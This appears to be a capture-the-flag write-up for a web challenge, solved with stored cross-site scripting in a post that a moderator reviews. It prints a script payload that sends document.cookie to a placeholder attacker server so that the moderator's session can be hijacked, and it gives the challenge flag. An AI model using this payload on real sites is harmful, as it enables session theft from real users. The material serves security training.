1.5 KiB
Difficulty
Difficult 90 punten
How to solve
The challenge consists of small web application where you can register and login. First you will need to register for a new account, as you don't know any account credentials yet. After doing so you will be redirected to the login page where you can use those credentials to log in.
After loggin in, you will be presented with a page that lists your posts. At first, this page will be empty, but new posts can be created using the "Create post" link.
To solve the challenge, you will need to create a posts that contains Javascript, for example like this:
<script>
window.top.location = "http://SOME_IP:SOME_PORT/?q="+document.cookie;
</script>
You will see that when you view an individual post, this HTML gets rendered and will be executed on the client side of whomever is viewing the page. As each post needs to be reviewed by a moderator, we hope that the page gets viewed by a moderator, and that the Javascript gets executed, therefore stealing the cookie details of the moderator.
For this to work, you will need an external server that is accesible from
the internet on SOME_IP:SOME_PORT and logs all of the request information
so that you can view it. At some point, the moderator will log in and
view your post containing the malicious Javascript, at this point, the
cookie is leaked and can be replaced in your on browser (through the developer tools for example).
Flag
IGCTF{BigTechWillnOtSiLenceUs}